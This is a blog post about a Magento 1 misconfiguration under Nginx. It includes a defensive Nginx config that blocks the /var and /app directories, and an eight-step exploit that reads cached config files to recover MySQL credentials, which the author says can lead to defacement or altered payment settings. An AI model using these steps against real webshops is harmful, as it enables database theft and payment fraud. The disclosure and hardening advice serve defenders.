[EN] Magento 1 cacheleak exploit

Posted 9 January 2017 in Tips & Tricks

In the last two years Magento released a lot of patches for (security) issues in Magento 1. If you apply those patches shortly after release you’re pretty safe. But your server configuration matters too! For example, when you swap the Apache web server for Nginx, .htaccess files no longer do anything, so you have to make sure the equivalent restrictions are configured in Nginx.

You can find .htaccess files across multiple folders with a default Magento 1 installation, not only in the root. For example the .htaccess file in the /var directory blocks access to all files in there. Don’t forget to block access to that directory in your Nginx configuration too! If you don’t block access people can access log files and even cached files. You may think that’s not dangerous but it is, with this exploit you can get the MySQL database credentials.
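As an added example (not from the original post), here are Nginx rules that reproduce what the stock Magento 1 .htaccess files do for the directories they protect; the server name, document root and PHP-FPM socket are placeholders:

```nginx
# Added example: Nginx equivalents of the "deny" rules that a default
# Magento 1 install ships as .htaccess files. example.com, /srv/www/magento
# and the fastcgi socket path are placeholders for your own setup.
server {
    listen 80;
    server_name example.com;
    root /srv/www/magento;
    index index.php;

    # Apache enforced these via .htaccess; Nginx ignores those files, so the
    # deny has to live here. "^~" takes priority over regex locations, so a
    # later "\.php$" block cannot reopen them.
    location ^~ /var/                { deny all; }   # logs, cache, resource_config.json
    location ^~ /app/                { deny all; }   # app/etc/local.xml holds the DB credentials
    location ^~ /includes/           { deny all; }
    location ^~ /lib/                { deny all; }
    location ^~ /pkginfo/            { deny all; }
    location ^~ /shell/              { deny all; }
    location ^~ /media/downloadable/ { deny all; }

    # Never serve dotfiles (.htaccess, .git, ...).
    location ~ /\. { deny all; }

    location / {
        try_files $uri $uri/ /index.php?$args;
    }

    # Only the Magento 1 front controllers need to reach PHP-FPM.
    location ~ ^/(index|get|cron|api|install)\.php$ {
        fastcgi_pass unix:/run/php/php-fpm.sock;
        fastcgi_index index.php;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        include fastcgi_params;
    }
}
```

After reloading Nginx, a request for /var/resource_config.json on your own site should return 403 instead of the file.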

  1. First, check if a website is vulnerable at magereport.com
  2. Try to access the resource_config.json file by visiting http://website.com/var/resource_config.json
  3. Copy and modify the media directory path from the resource_config.json file to something like: /home/users/username/website.com/app/etc (make sure it points to /app/etc)
  4. Create an MD5 hash from that path, for example with http://www.md5.cz/ or from the terminal: php -r "echo md5('PATH');" and replace PATH with the path; that will generate something like: 68095313d2b99db25e7ebcd5bc8d9642
  5. Use the first 3 characters from that hash, with my example that will be 680
  6. Visit http://website.com/var/cache/mage--2/mage---XXX_CONFIG_GLOBAL and replace the XXX with those 3 characters
  7. Now you can search in the global configuration, you can find among other things the MySQL credentials here
  8. Try to connect to the database remotely or search for a PhpMyAdmin or Adminer script

From that point the possibilities are endless, as I’ve written before in my Hacking public GIT repositories post: from defacing to changing payment provider credentials and further.

Why publish this exploit now? I “created” it in 2015, but back then a lot of webshops were vulnerable. Meanwhile the percentage is pretty low, so I thought: let’s share it with the world.

Do you need a security audit for your webshop? Contact me!